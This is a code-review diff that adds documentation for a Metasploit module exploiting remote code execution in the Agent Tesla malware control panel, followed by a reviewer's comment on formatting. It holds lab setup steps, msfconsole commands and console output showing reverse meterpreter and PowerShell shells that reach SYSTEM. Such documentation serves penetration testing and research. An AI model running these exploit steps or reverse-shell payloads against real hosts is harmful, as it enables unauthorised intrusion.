documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md

```diff
@@ -0,0 +1,268 @@
+
+As example:
+
+```php
+/* // Comment the authentication.
+session_start();
+  if (!isset($_SESSION['logged_in'])
+    || $_SESSION['logged_in'] !== true) {
+    header('Location: login.php');
+    exit;
+  }
+*/
+```
+
+1. Uncompress the [WebPanel3.7z](https://github.com/mekhalleh/agent_tesla_panel_rce/raw/master/resources/WebPanel3.7z) into your Web directory.
+2. Remove the config file `WebPanel/config.php` (it is generated at step 3).
+3. Go to: <http://localhost/WebPanel/setup.php>.
+4. You can log into Agent Tesla Web panel, all is done.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
+3. Do: `set RHOSTS IP`
+4. Do: `run`
+--or--
+1. Start msfconsole
+2. Do: `use exploit/multi/http/agent_tesla_panel_rce`
+3. Do: `set RHOSTS IP`
+4. Do: `set USERNAME REDACTED`
+5. Do: `set PASSWORD REDACTED`
+5. Do: `run`
+
+## Targets
+
+```
+   Id  Name
+   --  ----
+   0   Automatic (Dropper)
+   1   Unix (In-Memory)
+   2   Windows (In-Memory)
+```
+
+## Options
+
+**PASSWORD**
+
+The Agent Tesla CnC password to authenticate with (needed if you attempt an authenticated RCE).
+
+**Proxies**
+
+A proxy chain of format type:host:port[,type:host:port][...]. It's optional.
+
+**RHOSTS**
+
+The target IP address on which the control center responds.
+
+**RPORT**
+
+The target TCP port on which the control center responds. Default: 80
+
+**SSL**
+
+Negotiate SSL/TLS for outgoing connections. Default: false
+
+**TARGETURI**
+
+The base URI path of control center. Default: '/WebPanel'
+
+**USERNAME**
+
+The Agent Tesla CnC username to authenticate with (needed if you attempt an authenticated RCE).
+
+**VHOST**
+
+The target HTTP server virtual host.
+
+## Usage
+
+### Targeting Windows
+
+```
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set rhosts 192.168.1.21
+rhosts => 192.168.1.21
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set lhost 192.168.1.13
+lhost => 192.168.1.13
+msf5 exploit(multi/http/agent_tesla_panel_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.13:4444
+[*] Targeted operating system is: windows
+[*] Sending php/meterpreter/reverse_tcp command payload
+[*] Payload uploaded as: .AUKU.php
+[*] Sending stage (38247 bytes) to 192.168.1.21
+[*] Meterpreter session 1 opened (192.168.1.13:4444 -> 192.168.1.21:1036) at 2019-09-04 01:24:12 +0400
+
+meterpreter >
+```
+
+--or--
+
+```
+msf5 exploit(multi/http/agent_tesla_panel_rce) > set target 2
+target => 2
+msf5 exploit(multi/http/agent_tesla_panel_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.13:4444
+[*] Sending cmd/windows/reverse_powershell command payload
+[*] Command shell session 2 opened (192.168.1.13:4444 -> 192.168.1.21:1040) at 2019-09-04 01:28:55 +0400
+
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\wamp64\www\WebPanel\server_side\scripts>whoami
+nt authority\system
+
+C:\wamp64\www\WebPanel\server_side\scripts>
+```
+
+--or--
```

Comment:
What is this `--or--` for here? Same as above and below. I don't need to see multiple payload options for one target. I want to see one successful exploitation per version of the software that you support, then that repeated for each OS you support as well. See previous comment for more info.